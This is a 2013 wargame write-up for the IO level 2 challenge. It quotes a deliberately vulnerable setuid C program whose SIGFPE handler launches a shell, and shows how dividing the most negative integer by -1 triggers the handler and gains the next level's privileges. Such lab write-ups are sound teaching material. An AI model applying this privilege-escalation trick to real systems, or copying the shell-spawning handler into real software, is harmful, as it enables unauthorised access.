We can use the password found from the previous level to access the server as level2 user.
Looking around, we can see that we are given the level02.c source code as well as the compiled binary level02 to work with. Let’s take a look at the source code for level2.
//a little fun brought to you by bla
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <setjmp.h>
void catcher(int a)
{
setresuid(geteuid(),geteuid(),geteuid());
printf("WIN!\n");
system("/bin/sh");
exit(0);
}
int main(int argc, char **argv)
{
puts("source code is available in level02.c\n");
if (argc != 3 || !atoi(argv[2]))
return 1;
signal(SIGFPE, catcher);
return abs(atoi(argv[1])) / atoi(argv[2]);
}
Analysing the code, we can see that we want the catcher function to execute. We can do that if we provide 3 arguments and the third argument cannot be 0. Note: In Linux, the program name is considered as one argument. With that in mind, our program would be of the form ./level02 arg1 arg2.
Now to actually cause the function catcher to execute, we have to cause a SIGFPE signal. How does that work? Looking into the manual page of signal.
SIGNAL(2) Linux Programmer's Manual SIGNAL(2)
NAME
signal - ANSI C signal handling
SYNOPSIS
#include <signal.h>
typedef void (*sighandler_t)(int);
sighandler_t signal(int signum, sighandler_t handler);
DESCRIPTION
The behavior of signal() varies across UNIX versions, and has also
varied historically across different versions of Linux. Avoid its
use: use sigaction(2) instead. See Portability below.
signal() sets the disposition of the signal signum to handler, which
is either SIG_IGN, SIG_DFL, or the address of a programmer-defined
function (a "signal handler").
If the signal signum is delivered to the process, then one of the fol-
lowing happens:
* If the disposition is set to SIG_IGN, then the signal is ignored.
* If the disposition is set to SIG_DFL, then the default action asso-
ciated with the signal (see signal(7)) occurs.
* If the disposition is set to a function, then first either the dis-
position is reset to SIG_DFL, or the signal is blocked (see Porta-
bility below), and then handler is called with argument signum. If
invocation of the handler caused the signal to be blocked, then the
signal is unblocked upon return from the handler.
The signals SIGKILL and SIGSTOP cannot be caught or ignored.
RETURN VALUE
signal() returns the previous value of the signal handler, or SIG_ERR
on error.
ERRORS
EINVAL signum is invalid.
CONFORMING TO
C89, C99, POSIX.1-2001.
NOTES
The effects of signal() in a multithreaded process are unspecified.
According to POSIX, the behavior of a process is undefined after it
ignores a SIGFPE, SIGILL, or SIGSEGV signal that was not generated by
kill(2) or raise(3). Integer division by zero has undefined result.
On some architectures it will generate a SIGFPE signal. (Also divid-
ing the most negative integer by -1 may generate SIGFPE.) Ignoring
this signal might lead to an endless loop.
...
...
We found what we are looking for! By dividing the most negative integer by -1, we might be able to generate a SIGFPE signal.
Unsigned integers are 32 bits, signed integers are 31 bits as the most significant bit is used to denote the polarity of the integer. Therefore, the most negative integer is \(-1 \times 2{31} = -2147483648\). So let’s try it out.
level2@io:/levels$ ./level02 -2147483648 -1
source code is available in level02.c
WIN!
sh-4.2$ whoami
level3
sh-4.2$
You’ll be able to find the password in the same location. As usual, write it down somewhere so you don’t have to do the level again to get the password.
Published on 14 Mar 2013 by Stanley Tan